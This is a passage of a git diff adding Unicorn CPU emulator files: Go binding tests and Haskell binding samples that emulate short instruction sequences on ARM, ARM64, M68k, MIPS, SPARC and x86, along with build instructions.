{ + t.Fatal("Bad register values.") + } +} + +func TestX86InOut(t *testing.T) { + code := "\x41\xE4\x3F\x4a\xE6\x46\x43" 
+ mu, err := MakeUc(MODE_32, code) + if err != nil { + t.Fatal(err) + } + var outVal uint64 + var inCalled, outCalled bool + mu.HookAdd(HOOK_INSN, func(_ Unicorn, port, size uint32) uint32 { + inCalled = true + switch size { + case 1: + return 0xf1 + case 2: + return 0xf2 + case 4: + return 0xf4 + default: + return 0 + } + }, 1, 0, X86_INS_IN) + mu.HookAdd(HOOK_INSN, func(_ Unicorn, port, size, value uint32) { + outCalled = true + var err error + switch size { + case 1: + outVal, err = mu.RegRead(X86_REG_AL) + case 2: + outVal, err = mu.RegRead(X86_REG_AX) + case 4: + outVal, err = mu.RegRead(X86_REG_EAX) + } + if err != nil { + t.Fatal(err) + } + }, 1, 0, X86_INS_OUT) + if err := mu.Start(ADDRESS, ADDRESS+uint64(len(code))); err != nil { + t.Fatal(err) + } + if !inCalled || !outCalled { + t.Fatal("Ports not accessed.") + } + if outVal != 0xf1 { + t.Fatal("Incorrect OUT value.") + } +} + +func TestX86Syscall(t *testing.T) { + code := "\x0f\x05" + mu, err := MakeUc(MODE_64, code) + if err != nil { + t.Fatal(err) + } + mu.HookAdd(HOOK_INSN, func(_ Unicorn) { + rax, _ := mu.RegRead(X86_REG_RAX) + mu.RegWrite(X86_REG_RAX, rax+1) + }, 1, 0, X86_INS_SYSCALL) + mu.RegWrite(X86_REG_RAX, 0x100) + err = mu.Start(ADDRESS, ADDRESS+uint64(len(code))) + if err != nil { + t.Fatal(err) + } + v, _ := mu.RegRead(X86_REG_RAX) + if v != 0x101 { + t.Fatal("Incorrect syscall return value.") + } +} + +func TestX86Mmr(t *testing.T) { + mu, err := MakeUc(MODE_64, "") + if err != nil { + t.Fatal(err) + } + err = mu.RegWriteMmr(X86_REG_GDTR, &X86Mmr{Selector: 0, Base: 0x1000, Limit: 0x1fff, Flags: 0}) + if err != nil { + t.Fatal(err) + } + mmr, err := mu.RegReadMmr(X86_REG_GDTR) + if mmr.Selector != 0 || mmr.Base != 0x1000 || mmr.Limit != 0x1fff || mmr.Flags != 0 { + t.Fatalf("mmr read failed: %#v", mmr) + } +} + +func BenchmarkX86Hook(b *testing.B) { + // loop rax times + code := "\x48\xff\xc8\x48\x83\xf8\x00\x0f\x8f\xf3\xff\xff\xff" + mu, err := MakeUc(MODE_64, code) + if err != nil { + 
b.Fatal(err) + } + count := 0 + mu.HookAdd(HOOK_CODE, func(_ Unicorn, addr uint64, size uint32) { + count++ + }, 1, 0) + mu.RegWrite(X86_REG_RAX, uint64(b.N)) + b.ResetTimer() + if err := mu.Start(ADDRESS, ADDRESS+uint64(len(code))); err != nil { + b.Fatal(err) + } + rax, _ := mu.RegRead(X86_REG_RAX) + if rax != 0 { + b.Errorf("benchmark fell short: rax (%d) != 0", rax) + } + if count != b.N*3 { + b.Fatalf("benchmark fell short: %d < %d", count, b.N) + } +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/.gitignore b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/.gitignore new file mode 100644 index 0000000..9966d82 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/.gitignore @@ -0,0 +1,24 @@ +dist +cabal-dev +*.o +*.hi +*.chi +*.chs.h +*.dyn_o +*.dyn_hi +.virtualenv +.hpc +.hsenv +.cabal-sandbox/ +cabal.sandbox.config +*.prof +*.aux +*.hp +SampleArm +SampleArm64 +SampleM68k +SampleMips +SampleSparc +SampleX86 +Shellcode +SampleBatchReg diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/README.TXT b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/README.TXT new file mode 100644 index 0000000..93766f6 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/README.TXT @@ -0,0 +1,31 @@ +This documentation explains how to install Haskell binding for Unicorn +from source. + + +0. Install the core engine as dependency + + Follow README in the root directory to compile & install the core. + + On *nix, this can simply be done by (project root directory): + + $ sudo ./make.sh install + + +1. Change directories into the Haskell bindings, build and install + + $ cd bindings/haskell + $ cabal install + + +If you are installing into a sandbox, run `cabal sandbox init` before +installing Unicorn's dependencies. 
+ +If the build fails, install c2hs manually `cabal install c2hs` (note that this +will probably also require you to run `cabal install alex` and `cabal install +happy` as well). If you are NOT using a sandbox, ensure that `$HOME/.cabal/bin` +is on your PATH. + +To build a sample (after having built and installed the Haskell bindings) + + $ cd bindings/haskell + $ ghc --make samples/SampleArm.hs diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/Setup.hs b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/Setup.hs new file mode 100644 index 0000000..9a994af --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/Setup.hs @@ -0,0 +1,2 @@ +import Distribution.Simple +main = defaultMain diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/samples/SampleArm.hs b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/samples/SampleArm.hs new file mode 100644 index 0000000..37fac09 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/samples/SampleArm.hs @@ -0,0 +1,134 @@ +-- Sample code to demonstrate how to emulate ARM code + +import Unicorn +import Unicorn.Hook +import qualified Unicorn.CPU.Arm as Arm + +import Data.Bits +import qualified Data.ByteString as BS +import Data.Word +import qualified Numeric as N (showHex) + +-- Code to be emulated +-- +-- mov r0, #0x37; sub r1, r2, r3 +armCode :: BS.ByteString +armCode = BS.pack [0x37, 0x00, 0xa0, 0xe3, 0x03, 0x10, 0x42, 0xe0] + +-- sub sp, #0xc +thumbCode :: BS.ByteString +thumbCode = BS.pack [0x83, 0xb0] + +-- Memory address where emulation starts +address :: Word64 +address = 0x10000 + +-- Pretty-print integral as hex +showHex :: (Integral a, Show a) => a -> String +showHex = + flip N.showHex "" + +-- Calculate code length +codeLength :: Num a => BS.ByteString -> a +codeLength = + fromIntegral . 
BS.length + +hookBlock :: BlockHook () +hookBlock _ addr size _ = + putStrLn $ ">>> Tracing basic block at 0x" ++ showHex addr ++ + ", block size = 0x" ++ (maybe "0" showHex size) + +hookCode :: CodeHook () +hookCode _ addr size _ = + putStrLn $ ">>> Tracing instruction at 0x" ++ showHex addr ++ + ", instruction size = 0x" ++ (maybe "0" showHex size) + +testArm :: IO () +testArm = do + putStrLn "Emulate ARM code" + + result <- runEmulator $ do + -- Initialize emulator in ARM mode + uc <- open ArchArm [ModeArm] + + -- Map 2MB memory for this emulation + memMap uc address (2 * 1024 * 1024) [ProtAll] + + -- Write machine code to be emulated to memory + memWrite uc address armCode + + -- Initialize machine registers + regWrite uc Arm.R0 0x1234 + regWrite uc Arm.R2 0x6789 + regWrite uc Arm.R3 0x3333 + + -- Tracing all basic blocks with customized callback + blockHookAdd uc hookBlock () 1 0 + + -- Tracing one instruction at address with customized callback + codeHookAdd uc hookCode () address address + + -- Emulate machine code in infinite time (last param = Nothing), or + -- when finishing all the code + let codeLen = codeLength armCode + start uc address (address + codeLen) Nothing Nothing + + -- Return the results + r0 <- regRead uc Arm.R0 + r1 <- regRead uc Arm.R1 + + return (r0, r1) + case result of + Right (r0, r1) -> do + -- Now print out some registers + putStrLn ">>> Emulation done. 
Below is the CPU context" + putStrLn $ ">>> R0 = 0x" ++ showHex r0 + putStrLn $ ">>> R1 = 0x" ++ showHex r1 + Left err -> putStrLn $ "Failed with error: " ++ show err ++ " (" ++ + strerror err ++ ")" + +testThumb :: IO () +testThumb = do + putStrLn "Emulate THUMB code" + + result <- runEmulator $ do + -- Initialize emulator in ARM mode + uc <- open ArchArm [ModeThumb] + + -- Map 2MB memory for this emulation + memMap uc address (2 * 1024 * 1024) [ProtAll] + + -- Write machine code to be emulated to memory + memWrite uc address thumbCode + + -- Initialize machine registers + regWrite uc Arm.Sp 0x1234 + + -- Tracing all basic blocks with customized callback + blockHookAdd uc hookBlock () 1 0 + + -- Tracing one instruction at address with customized callback + codeHookAdd uc hookCode () address address + + -- Emulate machine code in infinite time (last param = Nothing), or + -- when finishing all the code + let codeLen = codeLength thumbCode + start uc (address .|. 1) (address + codeLen) Nothing Nothing + + -- Return the results + sp <- regRead uc Arm.Sp + + return sp + case result of + Right sp -> do + -- Now print out some registers + putStrLn ">>> Emulation done. 
Below is the CPU context" + putStrLn $ ">>> SP = 0x" ++ showHex sp + Left err -> putStrLn $ "Failed with error: " ++ show err ++ " (" ++ + strerror err ++ ")" + +main :: IO () +main = do + testArm + putStrLn "==========================" + testThumb diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/samples/SampleArm64.hs b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/samples/SampleArm64.hs new file mode 100644 index 0000000..db1158a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/samples/SampleArm64.hs @@ -0,0 +1,85 @@ +-- Sample code to demonstrate how to emulate ARM64 code + +import Unicorn +import Unicorn.Hook +import qualified Unicorn.CPU.Arm64 as Arm64 + +import qualified Data.ByteString as BS +import Data.Word +import qualified Numeric as N (showHex) + +-- Code to be emulated +-- +-- add x11, x13, x15 +armCode :: BS.ByteString +armCode = BS.pack [0xab, 0x01, 0x0f, 0x8b] + +-- Memory address where emulation starts +address :: Word64 +address = 0x10000 + +-- Pretty-print integral as hex +showHex :: (Integral a, Show a) => a -> String +showHex = + flip N.showHex "" + +-- Calculate code length +codeLength :: Num a => BS.ByteString -> a +codeLength = + fromIntegral . 
BS.length + +hookBlock :: BlockHook () +hookBlock _ addr size _ = + putStrLn $ ">>> Tracing basic block at 0x" ++ showHex addr ++ + ", block size = 0x" ++ (maybe "0" showHex size) + +hookCode :: CodeHook () +hookCode _ addr size _ = + putStrLn $ ">>> Tracing instruction at 0x" ++ showHex addr ++ + ", instruction size = 0x" ++ (maybe "0" showHex size) + +testArm64 :: IO () +testArm64 = do + putStrLn "Emulate ARM64 code" + + result <- runEmulator $ do + -- Initialize emulator in ARM mode + uc <- open ArchArm64 [ModeArm] + + -- Map 2MB memory for this emulation + memMap uc address (2 * 1024 * 1024) [ProtAll] + + -- Write machine code to be emulated to memory + memWrite uc address armCode + + -- Initialize machine registers + regWrite uc Arm64.X11 0x1234 + regWrite uc Arm64.X13 0x6789 + regWrite uc Arm64.X15 0x3333 + + -- Tracing all basic blocks with customized callback + blockHookAdd uc hookBlock () 1 0 + + -- Tracing one instruction at address with customized callback + codeHookAdd uc hookCode () address address + + -- Emulate machine code in infinite time (last param = Nothing), or + -- when finishing all the code + let codeLen = codeLength armCode + start uc address (address + codeLen) Nothing Nothing + + -- Return the results + x11 <- regRead uc Arm64.X11 + + return x11 + case result of + Right x11 -> do + -- Now print out some registers + putStrLn $ ">>> Emulation done. 
Below is the CPU context" + putStrLn $ ">>> X11 = 0x" ++ showHex x11 + Left err -> putStrLn $ "Failed with error: " ++ show err ++ " (" ++ + strerror err ++ ")" + +main :: IO () +main = + testArm64 diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/samples/SampleBatchReg.hs b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/samples/SampleBatchReg.hs new file mode 100644 index 0000000..9b40b3f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/samples/SampleBatchReg.hs @@ -0,0 +1,99 @@ +import Unicorn +import Unicorn.Hook +import qualified Unicorn.CPU.X86 as X86 + +import Control.Monad.Trans.Class (lift) +import qualified Data.ByteString as BS +import Data.Int +import Data.List (intercalate) +import Data.Word +import qualified Numeric as N (showHex) +import System.IO (hPutStrLn, stderr) + +syscallABI :: [X86.Register] +syscallABI = [ X86.Rax + , X86.Rdi + , X86.Rsi + , X86.Rdx + , X86.R10 + , X86.R8 + , X86.R9 + ] + +vals :: [Int64] +vals = [ 200 + , 10 + , 11 + , 12 + , 13 + , 14 + , 15 + ] + +ucPerror :: Error + -> IO () +ucPerror err = + hPutStrLn stderr $ "Error " ++ ": " ++ strerror err + +base :: Word64 +base = 0x10000 + +-- mov rax, 100; mov rdi, 1; mov rsi, 2; mov rdx, 3; mov r10, 4; mov r8, 5; mov r9, 6; syscall +code :: BS.ByteString +code = BS.pack [ 0x48, 0xc7, 0xc0, 0x64, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc7 + , 0x01, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0x02, 0x00, 0x00 + , 0x00, 0x48, 0xc7, 0xc2, 0x03, 0x00, 0x00, 0x00, 0x49, 0xc7 + , 0xc2, 0x04, 0x00, 0x00, 0x00, 0x49, 0xc7, 0xc0, 0x05, 0x00 + , 0x00, 0x00, 0x49, 0xc7, 0xc1, 0x06, 0x00, 0x00, 0x00, 0x0f + , 0x05 + ] + +-- Pretty-print integral as hex +showHex :: (Integral a, Show a) => a -> String +showHex i = + N.showHex (fromIntegral i :: Word64) "" + +-- Write a string (with a newline character) to standard output in the emulator +emuPutStrLn :: String -> Emulator () +emuPutStrLn = + lift . 
putStrLn + +hookSyscall :: SyscallHook () +hookSyscall uc _ = do + runEmulator $ do + readVals <- regReadBatch uc syscallABI + emuPutStrLn $ "syscall: {" + ++ intercalate ", " (map show readVals) + ++ "}" + return () + +hookCode :: CodeHook () +hookCode _ addr size _ = do + putStrLn $ "HOOK_CODE: 0x" ++ showHex addr ++ ", 0x" ++ + maybe "0" showHex size + +main :: IO () +main = do + result <- runEmulator $ do + uc <- open ArchX86 [Mode64] + + -- regWriteBatch + emuPutStrLn "regWriteBatch {200, 10, 11, 12, 13, 14, 15}" + regWriteBatch uc syscallABI vals + + readVals <- regReadBatch uc syscallABI + + emuPutStrLn $ "regReadBatch = {" + ++ intercalate ", " (map show readVals) + ++ "}" + + -- syscall + emuPutStrLn "running syscall shellcode" + syscallHookAdd uc hookSyscall () 1 0 + memMap uc base (0x1000) [ProtAll] + memWrite uc base code + let codeLen = fromIntegral $ BS.length code + start uc base (base + codeLen) Nothing Nothing + case result of + Right _ -> return () + Left err -> ucPerror err diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/samples/SampleM68k.hs b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/samples/SampleM68k.hs new file mode 100644 index 0000000..d77f4cf --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/samples/SampleM68k.hs @@ -0,0 +1,142 @@ +-- Sample code to demonstrate how to emulate m68k code + +import Unicorn +import Unicorn.Hook +import qualified Unicorn.CPU.M68k as M68k + +import qualified Data.ByteString as BS +import Data.Word +import qualified Numeric as N (showHex) + +-- Code to be emulated +-- +-- movq #-19, %d3 +m68kCode :: BS.ByteString +m68kCode = BS.pack [0x76, 0xed] + +-- Memory address where emulation starts +address :: Word64 +address = 0x10000 + +-- Pretty-print integral as hex +showHex :: (Integral a, Show a) => a -> String +showHex = + flip N.showHex "" + +-- Calculate code length +codeLength :: Num a => BS.ByteString -> a +codeLength = + fromIntegral . 
BS.length + +hookBlock :: BlockHook () +hookBlock _ addr size _ = + putStrLn $ ">>> Tracing basic block at 0x" ++ showHex addr ++ + ", block size = 0x" ++ (maybe "0" showHex size) + +hookCode :: CodeHook () +hookCode _ addr size _ = + putStrLn $ ">>> Tracing instruction at 0x" ++ showHex addr ++ + ", instruction size = 0x" ++ (maybe "0" showHex size) + +testM68k :: IO () +testM68k = do + putStrLn "Emulate M68K code" + + result <- runEmulator $ do + -- Initialize emulator in M68K mode + uc <- open ArchM68k [ModeBigEndian] + + -- Map 2MB memory for this emulation + memMap uc address (2 * 1024 * 1024) [ProtAll] + + -- Write machine code to be emulated to memory + memWrite uc address m68kCode + + -- Initialize machine registers + regWrite uc M68k.D0 0x0000 + regWrite uc M68k.D1 0x0000 + regWrite uc M68k.D2 0x0000 + regWrite uc M68k.D3 0x0000 + regWrite uc M68k.D4 0x0000 + regWrite uc M68k.D5 0x0000 + regWrite uc M68k.D6 0x0000 + regWrite uc M68k.D7 0x0000 + + regWrite uc M68k.A0 0x0000 + regWrite uc M68k.A1 0x0000 + regWrite uc M68k.A2 0x0000 + regWrite uc M68k.A3 0x0000 + regWrite uc M68k.A4 0x0000 + regWrite uc M68k.A5 0x0000 + regWrite uc M68k.A6 0x0000 + regWrite uc M68k.A7 0x0000 + + regWrite uc M68k.Pc 0x0000 + regWrite uc M68k.Sr 0x0000 + + -- Tracing all basic blocks with customized callback + blockHookAdd uc hookBlock () 1 0 + + -- Tracing all instruction + codeHookAdd uc hookCode () 1 0 + + -- Emulate machine code in infinite time (last param = Nothing), or + -- when finishing all the code + let codeLen = codeLength m68kCode + start uc address (address + codeLen) Nothing Nothing + + -- Return the results + d0 <- regRead uc M68k.D0 + d1 <- regRead uc M68k.D1 + d2 <- regRead uc M68k.D2 + d3 <- regRead uc M68k.D3 + d4 <- regRead uc M68k.D4 + d5 <- regRead uc M68k.D5 + d6 <- regRead uc M68k.D6 + d7 <- regRead uc M68k.D7 + + a0 <- regRead uc M68k.A0 + a1 <- regRead uc M68k.A1 + a2 <- regRead uc M68k.A2 + a3 <- regRead uc M68k.A3 + a4 <- regRead uc M68k.A4 + a5 <- 
regRead uc M68k.A5 + a6 <- regRead uc M68k.A6 + a7 <- regRead uc M68k.A7 + + pc <- regRead uc M68k.Pc + sr <- regRead uc M68k.Sr + + return (d0, d1, d2, d3, d4, d5, d6, d7, + a0, a1, a2, a3, a4, a5, a6, a7, + pc, sr) + case result of + Right (d0, d1, d2, d3, d4, d5, d6, d7, + a0, a1, a2, a3, a4, a5, a6, a7, + pc, sr) -> do + -- Now print out some registers + putStrLn ">>> Emulation done. Below is the CPU context" + putStrLn $ ">>> A0 = 0x" ++ showHex a0 ++ + "\t\t>>> D0 = 0x" ++ showHex d0 + putStrLn $ ">>> A1 = 0x" ++ showHex a1 ++ + "\t\t>>> D1 = 0x" ++ showHex d1 + putStrLn $ ">>> A2 = 0x" ++ showHex a2 ++ + "\t\t>>> D2 = 0x" ++ showHex d2 + putStrLn $ ">>> A3 = 0x" ++ showHex a3 ++ + "\t\t>>> D3 = 0x" ++ showHex d3 + putStrLn $ ">>> A4 = 0x" ++ showHex a4 ++ + "\t\t>>> D4 = 0x" ++ showHex d4 + putStrLn $ ">>> A5 = 0x" ++ showHex a5 ++ + "\t\t>>> D5 = 0x" ++ showHex d5 + putStrLn $ ">>> A6 = 0x" ++ showHex a6 ++ + "\t\t>>> D6 = 0x" ++ showHex d6 + putStrLn $ ">>> A7 = 0x" ++ showHex a7 ++ + "\t\t>>> D7 = 0x" ++ showHex d7 + putStrLn $ ">>> PC = 0x" ++ showHex pc + putStrLn $ ">>> SR = 0x" ++ showHex sr + Left err -> putStrLn $ "Failed with error: " ++ show err ++ " (" ++ + strerror err ++ ")" + +main :: IO () +main = + testM68k diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/samples/SampleMips.hs b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/samples/SampleMips.hs new file mode 100644 index 0000000..83efdbd --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/samples/SampleMips.hs @@ -0,0 +1,129 @@ +-- Sample code to demonstrate how to emulate Mips code (big endian) + +import Unicorn +import Unicorn.Hook +import qualified Unicorn.CPU.Mips as Mips + +import qualified Data.ByteString as BS +import Data.Word +import qualified Numeric as N (showHex) + +-- Code to be emulated +-- +-- ori $at, $at, 0x3456 +mipsCodeEb :: BS.ByteString +mipsCodeEb = BS.pack [0x34, 0x21, 0x34, 0x56] + +-- ori $at, $at, 0x3456 
+mipsCodeEl :: BS.ByteString +mipsCodeEl = BS.pack [0x56, 0x34, 0x21, 0x34] + +-- Memory address where emulation starts +address :: Word64 +address = 0x10000 + +-- Pretty-print integral as hex +showHex :: (Integral a, Show a) => a -> String +showHex = + flip N.showHex "" + +-- Calculate code length +codeLength :: Num a => BS.ByteString -> a +codeLength = + fromIntegral . BS.length + +hookBlock :: BlockHook () +hookBlock _ addr size _ = + putStrLn $ ">>> Tracing basic block at 0x" ++ showHex addr ++ + ", block size = 0x" ++ (maybe "0" showHex size) + +hookCode :: CodeHook () +hookCode _ addr size _ = + putStrLn $ ">>> Tracing instruction at 0x" ++ showHex addr ++ + ", instruction size = 0x" ++ (maybe "0" showHex size) + +testMipsEb :: IO () +testMipsEb = do + putStrLn "Emulate MIPS code (big-endian)" + + result <- runEmulator $ do + -- Initialize emulator in MIPS mode + uc <- open ArchMips [ModeMips32, ModeBigEndian] + + -- Map 2MB memory for this emulation + memMap uc address (2 * 1024 * 1024) [ProtAll] + + -- Write machine code to be emulated to memory + memWrite uc address mipsCodeEb + + -- Initialise machine registers + regWrite uc Mips.Reg1 0x6789 + + -- Tracing all basic blocks with customized callback + blockHookAdd uc hookBlock () 1 0 + + -- Tracing one instruction at address with customized callback + codeHookAdd uc hookCode () address address + + -- Emulate machine code in infinite time (last param = Nothing), or + -- when finishing all the code + let codeLen = codeLength mipsCodeEb + start uc address (address + codeLen) Nothing Nothing + + -- Return the results + r1 <- regRead uc Mips.Reg1 + + return r1 + case result of + Right r1 -> do + -- Now print out some registers + putStrLn ">>> Emulation done. 
Below is the CPU context" + putStrLn $ ">>> R1 = 0x" ++ showHex r1 + Left err -> putStrLn $ "Failed with error: " ++ show err ++ " (" ++ + strerror err ++ ")" + +testMipsEl :: IO () +testMipsEl = do + putStrLn "===========================" + putStrLn "Emulate MIPS code (little-endian)" + + result <- runEmulator $ do + -- Initialize emulator in MIPS mode + uc <- open ArchMips [ModeMips32, ModeLittleEndian] + + -- Map 2MB memory for this emulation + memMap uc address (2 * 1024 * 1024) [ProtAll] + + -- Write machine code to be emulated to memory + memWrite uc address mipsCodeEl + + -- Initialize machine registers + regWrite uc Mips.Reg1 0x6789 + + -- Tracing all basic blocks with customized callback + blockHookAdd uc hookBlock () 1 0 + + -- Tracing one instruction at address with customized callback + codeHookAdd uc hookCode () address address + + -- Emulate machine code in infinite time (last param = Nothing), or + -- when finishing all the code + let codeLen = codeLength mipsCodeEl + start uc address (address + codeLen) Nothing Nothing + + -- Return the results + r1 <- regRead uc Mips.Reg1 + + return r1 + case result of + Right r1 -> do + -- Now print out some registers + putStrLn ">>> Emulation done. 
Below is the CPU context" + putStrLn $ ">>> R1 = 0x" ++ showHex r1 + Left err -> putStrLn $ "Failed with error: " ++ show err ++ " (" ++ + strerror err ++ ")" + +main :: IO () +main = do + testMipsEb + testMipsEl diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/samples/SampleSparc.hs b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/samples/SampleSparc.hs new file mode 100644 index 0000000..02a0984 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/samples/SampleSparc.hs @@ -0,0 +1,85 @@ +-- Sample code to demonstrate how to emulate Sparc code + +import Unicorn +import Unicorn.Hook +import qualified Unicorn.CPU.Sparc as Sparc + +import qualified Data.ByteString as BS +import Data.Word +import qualified Numeric as N (showHex) + +-- Code to be emulated +-- +-- add %g1, %g2, %g3 +sparcCode :: BS.ByteString +sparcCode = BS.pack [0x86, 0x00, 0x40, 0x02] + +-- Memory address where emulation starts +address :: Word64 +address = 0x10000 + +-- Pretty-print integral as hex +showHex :: (Integral a, Show a) => a -> String +showHex = + flip N.showHex "" + +-- Calculate code length +codeLength :: Num a => BS.ByteString -> a +codeLength = + fromIntegral . 
BS.length + +hookBlock :: BlockHook () +hookBlock _ addr size _ = + putStrLn $ ">>> Tracing basic block at 0x" ++ showHex addr ++ + ", block size = 0x" ++ (maybe "0" showHex size) + +hookCode :: CodeHook () +hookCode _ addr size _ = + putStrLn $ ">>> Tracing instruction at 0x" ++ showHex addr ++ + ", instruction size = 0x" ++ (maybe "0" showHex size) + +testSparc :: IO () +testSparc = do + putStrLn "Emulate SPARC code" + + result <- runEmulator $ do + -- Initialize emulator in Sparc mode + uc <- open ArchSparc [ModeSparc32, ModeBigEndian] + + -- Map 2MB memory for this emulation + memMap uc address (2 * 1024 * 1024) [ProtAll] + + -- Write machine code to be emulated to memory + memWrite uc address sparcCode + + -- Initialize machine registers + regWrite uc Sparc.G1 0x1230 + regWrite uc Sparc.G2 0x6789 + regWrite uc Sparc.G3 0x5555 + + -- Tracing all basic blocks with customized callback + blockHookAdd uc hookBlock () 1 0 + + -- Tracing all instructions with customized callback + codeHookAdd uc hookCode () 1 0 + + -- Emulate machine code in infinite time (last param = Nothing), or + -- when finishing all the code + let codeLen = codeLength sparcCode + start uc address (address + codeLen) Nothing Nothing + + -- Return results + g3 <- regRead uc Sparc.G3 + + return g3 + case result of + Right g3 -> do + -- Now print out some registers + putStrLn ">>> Emulation done. 
Below is the CPU context" + putStrLn $ ">>> G3 = 0x" ++ showHex g3 + Left err -> putStrLn $ "Failed with error: " ++ show err ++ " (" ++ + strerror err ++ ")" + +main :: IO () +main = + testSparc diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/samples/SampleX86.hs b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/samples/SampleX86.hs new file mode 100644 index 0000000..5f4640e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/samples/SampleX86.hs @@ -0,0 +1,744 @@ +-- Sample code to demonstrate how to emulate X86 code + +import Unicorn +import Unicorn.Hook +import qualified Unicorn.CPU.X86 as X86 + +import Control.Monad.Trans.Class (lift) +import qualified Data.ByteString as BS +import Data.Word +import qualified Numeric as N (showHex) +import System.Environment + +-- Code to be emulated +-- +-- inc ecx; dec edx +x86Code32 :: BS.ByteString +x86Code32 = BS.pack [0x41, 0x4a] + +-- jmp 4; nop; nop; nop; nop; nop; nop +x86Code32Jump :: BS.ByteString +x86Code32Jump = BS.pack [0xeb, 0x02, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90] + +-- inc ecx; dec edx; jmp self-loop +x86Code32Loop :: BS.ByteString +x86Code32Loop = BS.pack [0x41, 0x4a, 0xeb, 0xfe] + +-- mov [0xaaaaaaaa], ecx; inc ecx; dec edx +x86Code32MemWrite :: BS.ByteString +x86Code32MemWrite = BS.pack [0x89, 0x0d, 0xaa, 0xaa, 0xaa, 0xaa, 0x41, 0x4a] + +-- mov ecx, [0xaaaaaaaa]; inc ecx; dec edx +x86Code32MemRead :: BS.ByteString +x86Code32MemRead = BS.pack [0x8b, 0x0d, 0xaa, 0xaa, 0xaa, 0xaa, 0x41, 0x4a] + +-- jmp ouside; inc ecx; dec edx +x86Code32JmpInvalid :: BS.ByteString +x86Code32JmpInvalid = BS.pack [0xe9, 0xe9, 0xee, 0xee, 0xee, 0x41, 0x4a] + +-- inc ecx; in al, 0x3f; dec edx; out 0x46, al; inc ebx +x86Code32InOut :: BS.ByteString +x86Code32InOut = BS.pack [0x41, 0xe4, 0x3f, 0x4a, 0xe6, 0x46, 0x43] + +-- inc eax +x86Code32Inc :: BS.ByteString +x86Code32Inc = BS.pack [0x40] + +x86Code64 :: BS.ByteString +x86Code64 = BS.pack [0x41, 0xbc, 0x3b, 0xb0, 0x28, 0x2a, 
0x49, 0x0f, 0xc9, + 0x90, 0x4d, 0x0f, 0xad, 0xcf, 0x49, 0x87, 0xfd, 0x90, + 0x48, 0x81, 0xd2, 0x8a, 0xce, 0x77, 0x35, 0x48, 0xf7, + 0xd9, 0x4d, 0x29, 0xf4, 0x49, 0x81, 0xc9, 0xf6, 0x8a, + 0xc6, 0x53, 0x4d, 0x87, 0xed, 0x48, 0x0f, 0xad, 0xd2, + 0x49, 0xf7, 0xd4, 0x48, 0xf7, 0xe1, 0x4d, 0x19, 0xc5, + 0x4d, 0x89, 0xc5, 0x48, 0xf7, 0xd6, 0x41, 0xb8, 0x4f, + 0x8d, 0x6b, 0x59, 0x4d, 0x87, 0xd0, 0x68, 0x6a, 0x1e, + 0x09, 0x3c, 0x59] + +-- add byte ptr [bx + si], al +x86Code16 :: BS.ByteString +x86Code16 = BS.pack [0x00, 0x00] + +-- SYSCALL +x86Code64Syscall :: BS.ByteString +x86Code64Syscall = BS.pack [0x0f, 0x05] + +-- Memory address where emulation starts +address :: Word64 +address = 0x1000000 + +-- Pretty-print integral as hex +showHex :: (Integral a, Show a) => a -> String +showHex i = + N.showHex (fromIntegral i :: Word64) "" + +-- Pretty-print byte string as hex +showHexBS :: BS.ByteString -> String +showHexBS = + concatMap (flip N.showHex "") . reverse . BS.unpack + +-- Write a string (with a newline character) to standard output in the emulator +emuPutStrLn :: String -> Emulator () +emuPutStrLn = + lift . putStrLn + +-- Calculate code length +codeLength :: Num a => BS.ByteString -> a +codeLength = + fromIntegral . 
BS.length + +-- Callback for tracing basic blocks +hookBlock :: BlockHook () +hookBlock _ addr size _ = + putStrLn $ ">>> Tracing basic block at 0x" ++ showHex addr ++ + ", block size = 0x" ++ (maybe "0" showHex size) + +-- Callback for tracing instruction +hookCode :: CodeHook () +hookCode uc addr size _ = do + runEmulator $ do + emuPutStrLn $ ">>> Tracing instruction at 0x" ++ showHex addr ++ + ", instruction size = 0x" ++ maybe "0" showHex size + + eflags <- regRead uc X86.Eflags + emuPutStrLn $ ">>> --- EFLAGS is 0x" ++ showHex eflags + return () + +-- Callback for tracing instruction +hookCode64 :: CodeHook () +hookCode64 uc addr size _ = do + runEmulator $ do + rip <- regRead uc X86.Rip + emuPutStrLn $ ">>> Tracing instruction at 0x" ++ showHex addr ++ + ", instruction size = 0x" ++ (maybe "0" showHex size) + emuPutStrLn $ ">>> RIP is 0x" ++ showHex rip + return () + +-- Callback for tracing memory access (READ or WRITE) +hookMemInvalid :: MemoryEventHook () +hookMemInvalid uc MemWriteUnmapped addr size (Just value) _ = do + runEmulator $ do + emuPutStrLn $ ">>> Missing memory is being WRITE at 